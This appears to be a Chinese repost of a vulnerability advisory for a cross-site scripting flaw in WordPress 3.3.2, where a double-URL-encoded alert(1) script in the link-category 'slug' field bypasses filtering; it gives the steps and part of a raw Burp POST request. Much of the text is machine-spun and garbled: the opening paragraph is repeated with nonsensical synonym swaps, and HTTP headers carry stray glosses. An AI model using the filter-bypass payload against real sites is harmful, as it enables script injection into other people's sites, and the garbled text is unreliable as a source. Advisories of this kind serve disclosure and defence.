wordpress版本3.3.2经常遭受到XSS(跨站脚本攻击)的漏洞攻击。然而,该攻击性不是非常严重。详情如下: a)登录管理员账号 b) 进入Links -> Links Categories菜单 c) 填写必要详情信息,拦截BURP suite请求。 d) 注入参数为slug。如果您在参数“slug”中注入<script>alert(1)</script> 值, 应用程序就会去除该攻击,数值变成alert1。如果有效负荷是双重编码,<script>alert(1)</script> 转化为%253cscript%253ealert%25281%2529%253c%252fscript%253e 旁路xss
wordpress版别3.3.2常常遭受到XSS(跨站脚本进犯)的缝隙进犯。但是,该进犯性不是十分严峻。概况如下:
a)登录管理员账号
b) 进入Links -> Links Categories菜单
c) 填写必要概况信息,阻拦BURP suite恳求。
d) 注入参数为slug。假如您在参数“slug”中注入<script>alert(1)</script> 值, 应用程序就会去除该进犯,数值变成alert1。假如有用负荷是两层编码,<script>alert(1)</script> 转化为%253cscript%253ealert%25281%2529%253c%252fscript%253e 旁路xss
维护。以下恳求将显现raw burp恳求、易受进犯参数和粗体符号的有用负荷。
BURP恳求
POST /wordpress/wp-admin/edit-tags.php HTTP/1.1
Host: localhost 主机:本地主机
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: 承受text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive 署理衔接:
Referer: 引证站点
知优网 » WordPress 3.3.2跨站点脚本进犯(wordpress入侵)